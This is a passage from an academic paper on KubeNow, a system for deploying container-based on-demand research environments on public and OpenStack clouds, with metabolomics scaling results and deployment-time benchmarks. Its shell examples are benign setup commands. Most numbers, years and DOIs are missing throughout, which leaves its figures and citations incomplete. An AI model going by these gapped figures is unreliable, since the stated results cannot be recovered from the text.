listing b shows an easier way of deploying a vre, which trades off configurability. indeed, configuring the deployment can be hard for inexperienced users. using the preset system, the user can specify a preset provided by the vre's community of practice, which populates the configuration files with a common setup for the cloud provider of choice. in this way the user only needs to fill in the cloud credentials and optionally make some configuration adjustments. following this approach, the configuration files also include the helm packages that need to be installed, thus the kn apply command can bring up the complete setup automatically.
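for example, an end-to-end session with a community preset might look as follows (the preset name and target directory are hypothetical placeholders; actual preset names are defined by each community of practice):

$ kn init --preset metabolomics aws my-vre
$ cd my-vre
# fill in the cloud credentials (and, optionally, adjust node counts or flavors)
# in the generated configuration files, then bring up the complete vre:
$ kn apply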
enabling scalable deployments
enabling fast and scalable deployments is crucial when leveraging cloud infrastructure on-demand. in fact, if the deployment time grows considerably when increasing the number of nodes, the vre instantiation time is likely to dominate over the analysis time, making it less appealing to invest in large-scale resources. in order to achieve fast and scalable deployments, we introduced two main ideas in our automation. first, the instances are booted from a preprovisioned image (collaboratively developed via travis ci, ). when the image is not present in the cloud user space, the deployment automation imports it, making all of the consecutive deployments considerably faster. using this approach, all of the required dependencies are already installed in the instances at boot time, without paying for any time-consuming downloads. the second idea consists in pushing the virtual machine contextualization through cloud-init ( ), by including a custom script in the instance bootstrap. in this way, the machines configure themselves independently at boot time, leading to better deployment-time scaling when compared to systems where a single workstation coordinates the whole setup process (as we show in 'evaluation'). this latter approach is even more inefficient when the deployment automation runs outside of the cloud network, which is a quite common scenario.
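the decentralized contextualization can be illustrated with a minimal bootstrap script passed as cloud-init user data; each node executes it independently at first boot, so no central workstation pushes configuration. the join command, address and token below are hypothetical placeholders and do not reflect kubenow's actual bootstrap logic:

#!/bin/bash
# runs on every node at boot via cloud-init; all dependencies are already
# baked into the preprovisioned image, so nothing is downloaded here
set -e
systemctl enable --now docker kubelet
# join the cluster advertised by the master node (placeholder values)
kubeadm join 10.0.0.10:6443 \
  --token abcdef.0123456789abcdef \
  --discovery-token-ca-cert-hash sha256:<hash>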
evaluation
we evaluate our methodology using kubenow as the implementation. being based on kubernetes, our system benefits from the resilience characteristics provided by the orchestration platform. resilience in kubernetes has been discussed and studied previously (vayghan et al., ; netto et al., ; javed et al., ) and it is trusted by several organizations (neal, ); thus, we do not show a resilience evaluation here. instead, we show how the adoption of our methodology enables scientific analysis at scale ('full analysis scaling'). in particular, we show that running posix and object storage as microservices, through kubenow, offers a scalable synchronization space for parallel scientific pipelines while enabling vres on commodity clouds, thus validating the design that we show in fig. . further, we show how kubenow scales in terms of deployment speed on each cloud provider, also in comparison with a broadly adopted kubernetes installer ('deployment automation scalability'). regarding this last point, it is not our intention to compare the cloud providers in terms of speed or functionality, but to show that the deployment scales well on each of them.

execution of scientific analysis
kubenow has been adopted by the phenomenal project to enable the instantiation of on-demand vres (peters et al., ). the phenomenal project aims at facilitating large-scale computing for metabolomics, a research field focusing on the chemical processes involving metabolites, which constitute the end products of processes that take place in biological cells. setting up the required middleware manually, when running phenomenal on demand, was originally a complex and repetitive task which often made the whole process infeasible. the adoption of kubenow has helped the phenomenal community to automate on-demand deployments, which now boil down to running a few commands on the researcher's workstation. on top of kubenow, the phenomenal vres run a variety of containerized processing tools as well as three workflow systems, a monitoring platform and various user interfaces. more in detail, the vres provide luigi (luigi, ), galaxy (goecks et al., ) and pachyderm (pachyderm, ) as workflow systems and the elasticsearch-fluentd-kibana stack (cyvoct, ) as the monitoring platform, all of which come with their built-in user interfaces. in addition, phenomenal vres also provide jupyter (jupyter, ) to enable interactive analysis through a web-based interface. phenomenal vres have seen applications in mass spectrometry and nuclear magnetic resonance analyses, as well as in fluxomics (emami khoonsari et al., ). even though these three use cases come from metabolomics studies, they are substantially different and require different tools and pipelining techniques. this suggests that our methodology is generally applicable and supports applications in other research fields.

parallelization of individual tools
gao et al. ( ) and novella et al. ( ) used the phenomenal vres to parallelize three individual metabolomics tools: batman (hao et al., ), featurefindermetabo (featurefindermetabo, ) and csi:fingerid (duhrkop et al., ). in these two studies different choices were made in terms of infrastructure setup, workflow system and cloud provider. however, in both cases the parallelization was performed by splitting the data into n partitions, where n was also the number of utilized vcpus, and by assigning each partition to a containerized tool replica. gao et al. ran their analysis on dimensional spectra of blood serum from the mesa consortium (bild et al., ; karaman et al., ), while novella et al. processed a large-scale dataset containing mass spectrometry runs from cerebrospinal fluid samples (herman et al., ). in both studies the performance is evaluated in terms of the measured speedup when increasing the number of utilized vcpus: the speedup on n vcpus was computed as t1/tn, where t1 is the running time of the containerized tool on a single core and tn is the running time of the parallel implementation on n cores (measured on the same cloud provider).

gao et al. used the luigi workflow system to parallelize batman on azure and on the embl-ebi openstack (embl-ebi cloud, ) installation.

figure : speedup plot for three containerized tools. the plot shows speedups for batman (azure and embl-ebi openstack), featurefindermetabo (aws) and csi:fingerid (aws), parallelized using the phenomenal on-demand vre on different cloud providers, against the linear (ideal) speedup; both axes use a logarithmic scale.

when running on azure they used service nodes with vcpus and gb of ram each, and a storage node with vcpus and gb of ram. on the embl-ebi openstack they used worker nodes with vcpus and gb of ram each, and storage nodes with vcpus and gb of ram each. under these settings they ran on , , , and vcpus on azure, and on , , , and vcpus on the embl-ebi openstack. novella et al. used the pachyderm workflow system to parallelize featurefindermetabo and csi:fingerid on aws, using the t . xlarge instance flavor (eight vcpus and gb of ram) for each node in their clusters. they used five service nodes and three storage nodes when running on vcpus, eight service nodes and four storage nodes when running on vcpus, service nodes and six storage nodes when running on vcpus, and service nodes and seven storage nodes when running on vcpus.
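the data-parallel pattern used in both studies—one partition per vcpu, one containerized tool replica per partition—can be sketched as follows. this is a simplified illustration only: the image name and paths are placeholders, the partitions are assumed to live on the shared posix volume, and the actual runs were driven by luigi and pachyderm rather than by a shell loop.

$ N=16                                          # number of partitions = number of vcpus
$ split -d --number=l/$N samples.list /shared/part-
$ for i in $(seq -w 0 $((N - 1))); do
    kubectl create job "tool-$i" \
      --image=example.org/metabolomics-tool:latest \
      -- process --input "/shared/part-$i" --output "/shared/out-$i"
  done
$ kubectl wait --for=condition=complete job --all --timeout=24h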
figure shows the measured speedup for each tool in the referenced studies. even though these tools differ in terms of cpu and i/o demands, their speedup grows close to linearly up to vcpus. for the batman use case, the speedup starts to level out at vcpus when running on azure and at vcpus when running on the embl-ebi openstack. however, we point out that gao et al. used only one storage node when running on azure, meaning that in that case more i/o contention occurred.

full analysis scaling
emami khoonsari et al. ( ) used the phenomenal vre to scale the preprocessing pipeline of mtbls , one of the largest metabolomics studies available on the metabolights repository (haug et al., ). the dataset consists of mass spectrometry samples from whole cell lysates of human renal proximal tubule cells. this use case is substantially different from the previous benchmarks, as the analysis was composed of several tools chained into a single pipeline, and because the scalability was evaluated over the full workflow. however, the parallelization was again implemented by assigning a roughly equal split of the data to each container replica.

figure : wse plot for the mtbls pipeline. the plot shows the weak scaling efficiency (wse) for the mtbls pipeline, executed using the phenomenal on-demand vre on an openstack-based provider.

the scalability of the pipeline was evaluated by computing the weak scaling efficiency (wse) when increasing the number of utilized vcpus. the pipeline was implemented using the luigi workflow system on the snic science cloud (ssc) (toor et al., ), an openstack-based provider, using the same instance flavor, with vcpus and gb of ram, for each node in the cluster. to compute the wse, the analysis was repeatedly run on / of the dataset ( vcpus), / of the dataset ( vcpus), / of the dataset ( vcpus) and on the full dataset ( vcpus). the wse was then computed as t_base/tn, where t_base was the running time measured on the smallest configuration and tn was the running time measured on n vcpus. figure shows the wse measures. there was a slight loss in wse when increasing the vcpus; however, at full regimen khoonsari et al. measured a wse of . , indicating good scalability. the loss in wse is due to growing network contention when increasing the dataset size. this problem can be mitigated by implementing locality-aware scheduling for containers (zhao, mohamed & ludwig, ), and we leave this as future work.

deployment automation scalability
in order to evaluate how the kubenow deployment automation scales over different cluster sizes, we measured and analyzed its deployment time on each of the supported cloud providers: aws (frankfurt region), azure (netherlands region), gcp (belgium region) and openstack (provided by embl-ebi cloud ( ) and located in the united kingdom). then, where applicable, we repeated the measurements using kubespray ( ), a broadly adopted kubernetes cloud installer, to make a comparison. the experiments were carried out from a local laptop, thus envisioning the common scenario where a researcher needs to set up a one-off cluster in a remote cloud project.
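a minimal way of collecting such timings with the kn cli is to wrap each deployment in time, once per provider and cluster size. this is an illustrative loop only; the provider identifiers and the destroy subcommand are assumptions on our part and may differ from the actual cli:

$ for provider in aws azure gce openstack; do
    kn init "$provider" "bench-$provider"
    # edit the node counts in the generated configuration files to match
    # the desired cluster size, then measure the wall-clock deployment time
    ( cd "bench-$provider" && time kn apply )
    ( cd "bench-$provider" && kn destroy )   # tear the one-off cluster down again
  done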
the laptop used was an apple macbook pro (model a , emc ) running on the uppsala university network (sweden). we measured the time for multiple instantiations on the supported cloud providers, doubling the size for each cluster instance. apart from the size, each cluster had the same topology: one master node (configured to act as edge), and a -to- ratio between service nodes and storage nodes. this service-to-storage ratio was shown to provide good performance, in terms of distributed data processing, in our previous study (emami khoonsari et al., ). hence, we started with a cluster setup that included one master node, five service nodes and three storage nodes (eight nodes in total, excluding the master) and, by doubling the size on each run, we scaled up to one master node, service nodes and storage nodes ( nodes in total, excluding the master). for each of these setups we repeated the measurement five times, to account for deployment-time fluctuations between identical clusters. finally, the flavors used for the nodes were: t .medium on aws, standard_ds _v on microsoft azure, n -standard- on gcp, and s .modest on embl-ebi openstack.

comparison between kubenow and kubespray
to make the comparison as fair as possible, we used the kubespray deployment automation that is based on ansible and terraform (the same tools that are used in kubenow), which uses a bastion node to enable provisioning with a single public ip address. it is worth repeating that public address scarcity is a common issue when dealing with commodity cloud installations, hence we tried to minimize their usage in our experiments. for large deployments, the kubespray documentation recommends increasing the default maximum parallelism in ansible and terraform. since in our experiments we planned to provision up to nodes, we set the maximum parallelism to this value for both kubenow and kubespray. to the best of our knowledge, kubespray makes storage nodes available only for openstack deployments, hence the comparison was possible only on the embl-ebi openstack provider.

figure shows the results for kubenow and kubespray in comparison. deployment-time fluctuations for repeated runs with the same cluster size were not significant. however, there is a significant difference in terms of scalability between the two systems. in fact, we observe that kubespray deployments scale poorly, as they increase in time by a large factor when the cluster size doubles. on the other hand, when doubling the number of nodes, kubenow's time increases by a considerably smaller factor, thus providing better scalability. the gap between the two systems becomes more significant as the deployments increase in size: for the biggest deployment ( nodes) kubenow is ∼ times faster than kubespray. to understand why such a big difference occurs, it is important to highlight how the deployment automation differs in the two systems. kubespray initiates deployments from vanilla images, and it orchestrates the installation from a single ansible script that runs in the user workstation (outside of the cloud network). provisioning vanilla images is not only more time-consuming, but it also causes more and more machines to pull packages over the same network as the deployments increase in size, impacting scalability. in the same way, the central ansible provisioner that orchestrates kubespray's deployments becomes slower and slower in pushing configurations as the number of nodes increases.
as we mentioned earlier, kubenow solves these problems by starting deployments from a preprovisioned image and by decentralizing the dynamic configuration through cloud-init.

figure : kubenow and kubespray deployment time comparison. the plot shows the deployment time, for different cluster sizes (number of nodes), when using kubenow and when using kubespray. the experiments were performed on the embl-ebi openstack; error bars for kubenow can be seen in fig. .

evaluation on multiple cloud providers

figure : kubenow deployment time by cloud provider. the plot shows the deployment time for different cluster sizes (number of nodes) on each of the supported cloud providers.

figure aims to highlight interesting differences in kubenow's deployment scaling over the different cloud providers. again, deployment-time fluctuations for repeated runs with the same cluster size were not significant. we obtained the best scaling on gcp and on the embl-ebi openstack, where every time we doubled the number of provisioned nodes we measured a considerably small increase in deployment time. when deploying on azure, we always measured a slightly longer time than on the other providers, which increased by a relatively small constant up to nodes. however, when we increased the number of nodes to , the deployment time on azure almost doubled. finally, on aws the deployment time was better than on the other providers for small clusters ( and nodes). however, when provisioning and nodes, the aws time increased by a larger factor, and it almost doubled when we scaled from to nodes.

when provisioning on different cloud providers, kubenow uses the same deployment strategy, which consists in creating the infrastructure with terraform and in waiting for the decentralized dynamic configuration to be completed on each node. the same ansible contextualization is then applied to make small adjustments in the deployment, on every cloud provider. since the deployment strategy is not cloud-specific, differences in deployment time among clouds are due to the infrastructure layer, which is managed independently by the providers. finally, it is important to point out that cloud providers can make changes in the infrastructure layer, impacting the results that we show in this study.

discussion
the presented methodology differs from the state of the art, as it makes use of a microservice-oriented architecture to deliver on-demand vres to scientists. this improves the isolation of vre components, and it enables the assembly of workflows of highly compartmentalized software components through the adoption of application containers. achieving scalability by using vms as the isolation mechanism would otherwise be unfeasible, due to the overhead introduced by the guest operating systems. the implementation of our methodology, namely kubenow, has been adopted by phenomenal: a live european collaboration in medical metabolomics.
various partners in phenomenal have successfully deployed and leveraged kubenow-based vres on the major public cloud providers as well as on national-scale openstack installations, including those provided by embl-ebi (embl-ebi cloud, ), de.nbi (de.nbi cloud, ), snic (toor et al., ), csc (csc cloud, ) and citycloud (citycloud, ). by referring to use cases in phenomenal, we have shown the ability of our methodology to scale scientific data processing, both in terms of individual tool parallelization ('parallelization of individual tools') and complete analysis scaling ('full analysis scaling'). it is important to point out that, since the analyses are fully defined via workflow languages, the pipelines are intrinsically well documented and, by using kubenow and the phenomenal-provided container images, any scientist can reproduce the results on any of the supported cloud providers.

when comparing kubenow with other available platforms provided by the it industry, such as kubespray, it is important to point out that our methodology is conceived for analytics, rather than for highly available service hosting. this design choice reflects a use case that we envision becoming predominant in science. in fact, while the it industry is embracing application containers to build resilient services at scale, scientists are making use of the technology to run reproducible and standardized analytics. when it comes to long-running service hosting, long deployment times and complex installation procedures are a reasonable price to pay, as they occur only initially. in contrast, we focus on a use case where researchers need to allocate cloud resources as needed. under these assumptions there is a need for simple, fast and scalable deployment procedures. kubenow meets these requirements by providing: ( ) an uncomplicated user interaction (see 'enabling scalable deployments') and ( ) fast and scalable deployments (see 'deployment automation scalability').

microservices and application containers are increasingly gaining momentum in scientific applications (peters et al., ; d'agostino et al., ; wu et al., ; williams et al., ). when it comes to on-demand vres, the technology presents some important advantages over current systems. our methodology is based on publicly available information from three research initiatives in substantially different scientific domains (phenomenal, extras and ska). it is important to point out that extras and ska provide microservices-oriented vres primarily as long-running platforms, and they do not cover on-demand instantiation, while our methodology made this possible in phenomenal. the requirements in terms of vre infrastructure are similar across domains, which allowed us to design our methodology to be generally applicable. hence, we envision our work and the presented benchmarks as valuable guidelines for communities of practice that need to build on-demand vre systems.

conclusion
here, we introduced a microservice-oriented methodology where scientific applications run in a distributed orchestration platform as light-weight software containers, referred to as on-demand vres. our methodology makes use of application containers to improve the isolation of vre components, and it uses cloud computing to dynamically procure infrastructure.
the methodology builds on publicly available information from three research initiatives, and it is generally applicable over multiple research domains. the applicability of the methodology was tested through an open source implementation, showing good scaling for data analysis in metabolomics and in terms of deployment speed. we envision communities of practice using our work as a guideline and blueprint to build on-demand vres.

ethical approval and informed consent
human-derived samples in the datasets are consented for analysis, publication and distribution, and they were processed according to the elsi guidelines (sariyar et al., ). ethics and consents are extensively explained in the referenced publications (gao et al., ; herman et al., ; ranninger et al., ).

acknowledgements
we kindly acknowledge contributions to cloud resources by snic, embl-ebi, citycloud, csc, aws and azure.

additional information and declarations

funding
this research was supported by the european commission's horizon programme under grant agreement number (phenomenal) and by the nordic e-infrastructure collaboration (neic) via the glenna and tryggve projects. the funders had no role in study design, data collection and analysis, decision to publish, or preparation of the manuscript.

grant disclosures
the following grant information was disclosed by the authors: the european commission's horizon programme: . nordic e-infrastructure collaboration (neic).

competing interests
the authors declare there are no competing interests.

author contributions
• marco capuccini conceived and designed the experiments, analyzed the data, contributed reagents/materials/analysis tools, prepared figures and/or tables, performed the computation work, authored or reviewed drafts of the paper, approved the final draft.
• anders larsson conceived and designed the experiments, contributed reagents/materials/analysis tools, authored or reviewed drafts of the paper, approved the final draft.
• matteo carone performed the experiments, analyzed the data, prepared figures and/or tables, performed the computation work, approved the final draft.
• jon ander novella, noureddin sadawi and jianliang gao performed the experiments, analyzed the data, contributed reagents/materials/analysis tools, performed the computation work, approved the final draft.
• salman toor and ola spjuth conceived and designed the experiments, authored or reviewed drafts of the paper, approved the final draft.

data availability
the following information was supplied regarding data availability: the data in the study by gao et al. is publicly available at https://doi.org/ . /m .figshare.c. . detailed instructions for reproducing the analysis can be found at https://github.com/csmsoftware/phnmnl-scalability. novella et al. and khoonsari et al. used public data from the metabolights repository, in particular the datasets mtbls and mtbls . detailed instructions for reproducing the analyses can be found at https://github.com/pharmbio/lc-ms-pachyderm and at https://github.com/phnmnl/mtbls -jupyter, respectively.
/peerj-cs. kubenow is publicly available as open-source software: https://github.com/kubenow/ kubenow detailed instruction for deploying kubenow and reproducing the experiments in ‘deployment automation scalability’ can be found at https://kubenow.readthedocs.io. phenomenal is publicly available as open-source software: https://github.com/phnmnl/ phenomenal-h /wiki. references amazon elastic container service. . available at https://docs.aws.amazon.com/ amazonecs/latest/developerguide/ecs_instances.html (accessed on may ). amazon elastic file system. . available at https://aws.amazon.com/efs (accessed on may ). ansible. . available at https://www.ansible.com (accessed on may ). armbrust m, fox a, griffith r, joseph ad, katz rh, konwinski a, lee g, patterson da, rabkin a, stoica i, zaharia m. . above the clouds: a berkeley view of cloud computing. technical report ucb/eecs- - . eecs department, university of california, berkeley. asay m. . why kubernetes is winning the container war. available at http://www. infoworld.com/article/ /cloud-computing/why-kubernetes-is-winning-the- container-war.html (accessed on may ). assante m, candela l, castelli d, cirillo r, coro g, frosini l, lelii l, mangiacrapa f, marioli v, pagano p, panichi g, perciante c, sinibaldi f. . the gcube system: delivering virtual research environments as-a-service. future generation computer systems : – doi . /j.future. . . . azure container instances. . available at https://azure.microsoft.com/en-us/services/ container-instances (accessed on may ). azure netapp files. . available at https://azure.microsoft.com/en-us/services/ storage/netapp (accessed on may ). baldini i, castro p, chang k, cheng p, fink s, ishakian v, mitchell n, muthusamy v, rabbah r, slominski a, suter p. . serverless computing: current trends and open problems. in: research advances in cloud computing. springer, – doi . / - - - - _ . bayramusta m, nasir va. . a fad or future of it?: a comprehensive literature review on the cloud computing research. international journal of information management ( ): – doi . /j.ijinfomgt. . . . bild de, bluemke da, burke gl, detrano r, diez roux av, folsom ar, greenland p, jacobs jr dr, kronmal r, liu k, nelson jc, o’leary d, saad mf, shea s, szklo m, tracy rp. . multi-ethnic study of atherosclerosis: objectives and design. american journal of epidemiology ( ): – doi . /aje/kwf . candela l, castelli d, pagano p. . virtual research environments: an overview and a research agenda. data science journal :grdi –grdi . citycloud. . available at http://citycloud.com (accessed on may ). cloud-init. . available at https://cloud-init.io (accessed on may ). capuccini et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://github.com/kubenow/kubenow https://github.com/kubenow/kubenow https://kubenow.readthedocs.io https://github.com/phnmnl/phenomenal-h /wiki https://github.com/phnmnl/phenomenal-h /wiki https://docs.aws.amazon.com/amazonecs/latest/developerguide/ecs_instances.html https://docs.aws.amazon.com/amazonecs/latest/developerguide/ecs_instances.html https://aws.amazon.com/efs https://www.ansible.com http://www.infoworld.com/article/ /cloud-computing/why-kubernetes-is-winning-the-container-war.html http://www.infoworld.com/article/ /cloud-computing/why-kubernetes-is-winning-the-container-war.html http://www.infoworld.com/article/ /cloud-computing/why-kubernetes-is-winning-the-container-war.html http://dx.doi.org/ . /j.future. . . 
https://azure.microsoft.com/en-us/services/container-instances https://azure.microsoft.com/en-us/services/container-instances https://azure.microsoft.com/en-us/services/storage/netapp https://azure.microsoft.com/en-us/services/storage/netapp http://dx.doi.org/ . / - - - - _ http://dx.doi.org/ . /j.ijinfomgt. . . http://dx.doi.org/ . /aje/kwf http://citycloud.com https://cloud-init.io http://dx.doi.org/ . /peerj-cs. cloudflare. . available at https://www.cloudflare.com (accessed on may ). cloudfuse. . available at https://github.com/redbo/cloudfuse (accessed on may ). csc cloud. . available at https://research.csc.fi/cloud-computing (accessed on may ). cyvoct p. . how to deploy an efk stack to kubernetes. available at https://blog.ptrk. io/how-to-deploy-an-efk-stack-to-kubernetes (accessed on august ). d’agostino d, roverelli l, zereik g, luca ad, salvaterra r, belfiore a, lisini g, novara g, tiengo a. . a microservice-based portal for x-ray transient and variable sources. peerj preprints :e . dahlö m, scofield dg, schaal w, spjuth o. . tracking the ngs revolution: managing life science research on shared high-performance computing clusters. gigascience ( ):article giy . de.nbi cloud. . available at https://www.denbi.de/cloud (accessed on may ). duhrkop k, shen h, meusel m, rousu j, bocker s. . searching molecular struc- ture databases with tandem mass spectra using csi:fingerid. proceedings of the national academy of sciences of the united states of america : – doi . /pnas. . elia ia, antunes n, laranjeiro n, vieira m. . an analysis of openstack vulnerabili- ties. in: th european dependable computing conference (edcc). – . emami khoonsari p, moreno p, bergmann s, burman j, capuccini m, carone m, cascante m, de atauri p, foguet c, gonzalez-beltran an, hankemeier t, haug k, he s, herman s, johnson d, kale n, larsson a, neumann s, peters k, pireddu l, rocca-serra p, roger p, rueedi r, ruttkies c, sadawi n, salek rm, sansone s-a, schober d, selivanov v, thévenot ea, van vliet m, zanetti g, steinbeck c, kultima k, spjuth o. . interoperable and scalable data analysis with microservices: applications in metabolomics. bioinformatics ( ): – doi . /bioinformatics/btz . embl-ebi cloud. . available at http://www.embassycloud.org (accessed on may ). featurefindermetabo. . available at https://abibuilder.informatik.uni-tuebingen.de/ archive/openms/documentation/rc/ . . /html/topp_featurefindermetabo.html (accessed on april ). gao j, sadawi n, karaman i, pearce j, mereno p, larsson a, capuccini m, elliott p, nicholson jk, ebbels t, glen rc. . metabolomics in the cloud: scaling computational tools to big data. arxiv preprint. arxiv: . . glusterfs. . available at https://www.gluster.org (accessed on may ). goecks j, nekrutenko a, taylor j, galaxy team. . galaxy: a comprehen- sive approach for supporting accessible, reproducible, and transparent com- putational research in the life sciences. genome biology ( ):article r doi . /gb- - - -r . google cloud filestore. . available at https://cloud.google.com/filestore (accessed on may ). capuccini et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://www.cloudflare.com https://github.com/redbo/cloudfuse https://research.csc.fi/cloud-computing https://blog.ptrk.io/how-to-deploy-an-efk-stack-to-kubernetes https://blog.ptrk.io/how-to-deploy-an-efk-stack-to-kubernetes https://www.denbi.de/cloud http://dx.doi.org/ . /pnas. http://dx.doi.org/ . 
/bioinformatics/btz http://www.embassycloud.org https://abibuilder.informatik.uni-tuebingen.de/archive/openms/documentation/rc/ . . /html/topp_featurefindermetabo.html https://abibuilder.informatik.uni-tuebingen.de/archive/openms/documentation/rc/ . . /html/topp_featurefindermetabo.html http://arxiv.org/abs/ . https://www.gluster.org http://dx.doi.org/ . /gb- - - -r https://cloud.google.com/filestore http://dx.doi.org/ . /peerj-cs. google cloud run. . available at https://cloud.google.com/run (accessed on may ). hao j, astle w, de iorio m, ebbels tmd. . batman—an r package for the automated quantification of metabolites from nuclear magnetic reso- nance spectra using a bayesian model. bioinformatics ( ): – doi . /bioinformatics/bts . haug k, salek r, conesa mingo p, hastings j, matos p, rijnbeek m, mahendraker t, williams m, neumann s, rocca-serra p, maguire e, gonzlez-beltrán a, sansone s-a, griffin j, steinbeck c. . metabolights—an open-access general-purpose repository for metabolomics studies and associated meta-data. nucleic acids research (d ):d –d . helm. . available at https://github.com/kubernetes/helm (accessed on may ). herman s, khoonsari p, tolf a, steinmetz j, zetterberg h, akerfeldt t, jakobsson p-j, larsson a, spjuth o, burman j, kultima k. . integration of magnetic resonance imaging and protein and metabolite csf measurements to enable early diagnosis of secondary progressive multiple sclerosis. theranostics ( ): – doi . /thno. . hindman b, konwinski a, zaharia m, ghodsi a, joseph ad, katz rh, shenker s, stoica i. . mesos: a platform for fine-grained resource sharing in the data center. in: nsdi, vol. . nsdi’ proceedings of the th usenix conference on networked systems design and implementation, – . available at https://www. usenix.org/legacy/events/nsdi /tech/full_papers/hindman.pdf . javed a, heljanko k, buda a, främling k. . cefiot: a fault-tolerant iot architec- ture for edge and cloud. in: ieee th world forum on internet of things (wf- iot). ieee, – . jupyter. . available at https://jupyter.org (accessed on may ). karakoyunlu c, kimpe d, carns p, harms k, ross r, ward l. . toward a unified object storage foundation for scalable storage systems. in: cluster computing (cluster), ieee international conference on. ieee, – . karaman i, ferreira dls, boulangé cl, kaluarachchi mr, herrington d, dona ac, castagné r, moayyeri a, lehne b, loh m, de vries ps, dehghan a, franco oh, hofman a, evangelou e, tzoulaki i, elliott p, lindon jc, ebbels tmd. . workflow for integrated processing of multicohort untargeted h nmr metabolomics data in large-scale metabolic epidemiology. journal of proteome research ( ): – doi . /acs.jproteome. b . khan a. . key characteristics of a container orchestration platform to enable a mod- ern application. ieee cloud computing ( ): – doi . /mcc. . . kubenow github organization. . available at https://github.com/kubenow (accessed on may ). kubespray. . available at https://github.com/kubernetes-incubator/kubespray (accessed on may ). kurtzer gm, sochat v, bauer mw. . singularity: scientific containers for mobility of compute. plos one ( ):e doi . /journal.pone. . capuccini et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://cloud.google.com/run http://dx.doi.org/ . /bioinformatics/bts https://github.com/kubernetes/helm http://dx.doi.org/ . /thno. https://www.usenix.org/legacy/events/nsdi /tech/full_papers/hindman.pdf https://www.usenix.org/legacy/events/nsdi /tech/full_papers/hindman.pdf https://jupyter.org http://dx.doi.org/ . 
/acs.jproteome. b http://dx.doi.org/ . /mcc. . https://github.com/kubenow https://github.com/kubernetes-incubator/kubespray http://dx.doi.org/ . /journal.pone. http://dx.doi.org/ . /peerj-cs. lampa s, dahlö m, olason pi, hagberg j, spjuth o. . lessons learned from implementing a national infrastructure in sweden for storage and analysis of next-generation sequencing data. gigascience ( ):article - x- - doi . / - x- - . laure e, edlund Å. . the e-infrastructure ecosystem: providing local support to global science. large-scale computing techniques for complex system simulations : – . luigi. . available at https://github.com/spotify/luigi (accessed on january ). manousis a, ragsdale r, draffin b, agrawal a, sekar v. . shedding light on the adoption of let’s encrypt. arxiv preprint. arxiv: . . manu ar, patel jk, akhtar s, agrawal vk, murthy knbs. . a study, analysis and deep dive on cloud paas security in terms of docker container security. in: international conference on circuit, power and computing technologies (iccpct). – . marathon. . available at https://mesosphere.github.io/marathon (accessed on april ). naik n. . building a virtual system of systems using docker swarm in multiple clouds. in: systems engineering (isse), ieee international symposium on. piscataway: ieee, – . neal f. . the state of microservices maturity. o’reilly media, inc. netto hv, lung lc, correia m, luiz af, de souza lms. . state machine replication in containers managed by kubernetes. journal of systems architecture : – doi . /j.sysarc. . . . nip.io. . available at http://nip.io (accessed on may ). novella ja, emami khoonsari p, herman s, whitenack d, capuccini m, burman j, kultima k, spjuth o. . container-based bioinformatics with pachyderm. bioinformatics ( ): – . open container initiative. . the principles of standard containers. available at https://github.com/opencontainers/runtime-spec/blob/master/principles.md (accessed on may ). openstack manila. . available at https://wiki.openstack.org/wiki/manila (accessed on may ). openstack zun. . available at https://docs.openstack.org/zun (accessed on may ). pachyderm. . available at https://pachyderm.io (accessed on may ). packer. . available at https://www.packer.io (accessed on may ). pathan a-mk, buyya r. . a taxonomy and survey of content delivery networks. technical report, . grid computing and distributed systems laboratory, univer- sity of melbourne. peters k, bradbury j, bergmann s, capuccini m, cascante m, de atauri p, ebbels tmd, foguet c, glen r, gonzalez-beltran a, günther ul, handakas e, hanke- meier t, haug k, herman s, holub p, izzo m, jacob d, johnson d, jourdan f, kale n, karaman i, khalili b, emamikhonsari p, kultima k, lampa s, larsson a, ludwig c, moreno p, neumann s, novella ja, o’donovan c, pearce jtm, capuccini et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . / - x- - https://github.com/spotify/luigi http://arxiv.org/abs/ . https://mesosphere.github.io/marathon http://dx.doi.org/ . /j.sysarc. . . http://nip.io https://github.com/opencontainers/runtime-spec/blob/master/principles.md https://wiki.openstack.org/wiki/manila https://docs.openstack.org/zun https://pachyderm.io https://www.packer.io http://dx.doi.org/ . /peerj-cs. peluso a, piras me, pireddu l, reed mac, rocca-serra p, roger p, rosato a, rueedi r, ruttkies c, sadawi n, salek rm, sansone s-a, selivanov v, spjuth o, schober d, thévenot ea, tomasoni m, vanrijswijk m, vanvliet m, viant mr, weber rjm, zanetti g, steinbeck c. . 
phenomenal: processing and analysis of metabolomics data in the cloud. gigascience ( ):article giy . ranninger c, schmidt le, rurik m, limonciel a, jennings p, kohlbacher o, huber cg. . improving global feature detectabilities through scan range splitting for untargeted metabolomics by high-performance liquid chromatography-orbitrap mass spectrometry. analytica chimica acta : – doi . /j.aca. . . . roth b, hecht r, volz b, jablonski s. . towards a generic cloud-based virtual research environment. in: computer software and applications conference workshops (compsacw), ieee th annual. piscataway: ieee, – . sariyar m, schluender i, smee c, suhr s. . sharing and reuse of sensitive data and samples: supporting researchers in identifying ethical and legal requirements. biopreservation and biobanking ( ): – doi . /bio. . . shimel a. . docker becomes de facto linux standard. available at http://www. networkworld.com/article/ /opensource-subnet/docker-becomes-de-facto- linux-standard.html (accessed on may ). terraform. . available at https://terraform.io (accessed on may ). traefik. . available at https://traefik.io (accessed on may ). travis ci. . available at https://travis-ci.org (accessed on may ). thönes j. . microservices. ieee software ( ): – . toor s, lindberg m, falman i, vallin a, mohill o, freyhult p, nilsson l, agback m, viklund l, zazzik h, spjuth o, capuccini m, möller j, murtagh d, hellander a. . snic science cloud (ssc): a national-scale cloud infrastructure for swedish academia. in: ieee th international conference on e-science (e-science). piscataway: ieee, – . vaughan-nichols sj. . containers vs. virtual machines: how to tell which is the right choice for your enterprise. available at https://www.networkworld.com/article/ /cloud-storage/containers-vs-virtual-machines-how-to-tell-which-is-the- right-choice-for-your-enterprise.html (accessed on june ). vayghan la, saied ma, toeroe m, khendek f. . deploying microservice based applications with kubernetes: experiments and lessons learned. in: ieee th international conference on cloud computing (cloud). ieee, – . vixie p, thomson s, rekhter y, bound j. . dynamic updates in the domain name system (dns update). technical report, rfc . weerasiri d, barukh mc, benatallah b, sheng qz, ranjan r. . a taxonomy and survey of cloud resource orchestration techniques. acm computing surveys (csur) ( ):article . williams cl, sica jc, killen rt, balis ug. . the growing need for microservices in bioinformatics. journal of pathology informatics :article doi . / - . . capuccini et al. ( ), 